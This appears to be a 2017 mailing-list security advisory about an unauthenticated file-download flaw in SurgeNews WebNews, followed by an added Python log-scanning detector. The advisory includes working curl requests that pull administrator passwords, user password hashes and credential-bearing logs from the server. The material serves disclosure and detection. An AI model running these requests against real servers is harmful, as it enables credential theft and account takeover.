Group: netwin.surgemail
Subject: SurgeNews Unauthenticated Credential Disclosure
Date: Fri, 16 Jun 2017 18:13:47 -0500

The SurgeNews WebNews web interface on TCP ports 9080 and 8119 allows
unauthenticated users to download arbitrary files from within the
SurgeNews root directory.

This allows unauthenticated users to gain access to sensitive information,
including the administrator username and password in clear text.

Additionally, if the NWAuth authentication mechanism is in use (default),
then all usernames and associated password hashes can be retrieved from
various files such as nwauth.add and nwauth.clg.

Furthermore, various log files contain passwords in clear text.


### Download Admin Username and Password

The password.log file contains configuration information including the
administrator username and password in clear text if the administrator
has used `surgenews -password` to set the administrator username and password.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=password.log'


### Download Install Log

The install.log file includes the administrator username and password
configured during installation.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=install.log'


### Download Administrator Username and Password Hash

The admin.dat file contains the administrator username and password hash.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=admin.dat'


### Download Username and Password Hash for All Users

The nwauth.add and nwauth.clg files contain the usernames and password
hashes for all users if the NWAuth authentication mechanism is in use.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=nwauth.add'
curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=nwauth.clg'


### Download HTTP Logs

The wweb.log file includes details of incoming HTTP requests including HTTP
headers. The headers may include 'Authorization' headers which contain
credentials in clear text.

The web logs appear to be cleared periodically, which reduces the window
in which credentials can be recovered from the web log.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=wweb.log' | grep Authorization
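As an added detection example, not part of this advisory: a Python scan that flags the file-download requests described above in access logs from a reverse proxy or WAF placed in front of the WebNews ports. The log format, the sample lines and the list of sensitive file names are assumptions drawn from the advisory text.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Files the advisory names as retrievable without authentication (taken from
# the advisory text; add any other files in the SurgeNews root you care about).
SENSITIVE_FILES = {
    "password.log", "install.log", "admin.dat",
    "nwauth.add", "nwauth.clg", "wweb.log",
}
# Common log format; an assumption, adapt to what the reverse proxy or WAF
# in front of the WebNews ports (9080/8119) actually writes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Constructed sample lines: two hits from one client, two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jun/2017:18:13:47 -0500] "GET /webnews/?cmd=part&fname=password.log HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jun/2017:18:13:48 -0500] "GET /webnews/?cmd=part&fname=..%2F..%2Fnwauth.add HTTP/1.1" 200 2048',
    '198.51.100.4 - - [16/Jun/2017:18:14:01 -0500] "GET /webnews/?cmd=part&fname=logo.gif HTTP/1.1" 200 3100',
    '198.51.100.4 - - [16/Jun/2017:18:14:02 -0500] "GET /webnews/?cmd=list&group=comp.lang.c HTTP/1.1" 200 900',
]


def classify_request(url):
    """Return why a WebNews request is suspicious, or None if it is not."""
    parts = urlsplit(url)
    if not parts.path.rstrip("/").endswith("/webnews"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "part" not in qs.get("cmd", []):
        return None  # only cmd=part serves raw files from the SurgeNews root
    for raw in qs.get("fname", []):
        name = unquote(raw)  # parse_qs decoded once; decode again for double encoding
        base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if base in SENSITIVE_FILES:
            return f"sensitive file requested: {name}"
        if ".." in name:  # precautionary; the advisory does not claim traversal works
            return f"path traversal in fname: {name}"
    return None


def scan_log(lines):
    """Return (client_ip, http_status, finding) for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (why := classify_request(m["url"])):
            findings.append((m["ip"], m["status"], why))
    return findings
```

A 200 status on a flagged request means the file was actually served, so those clients and the credentials in the named files should be treated as compromised.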

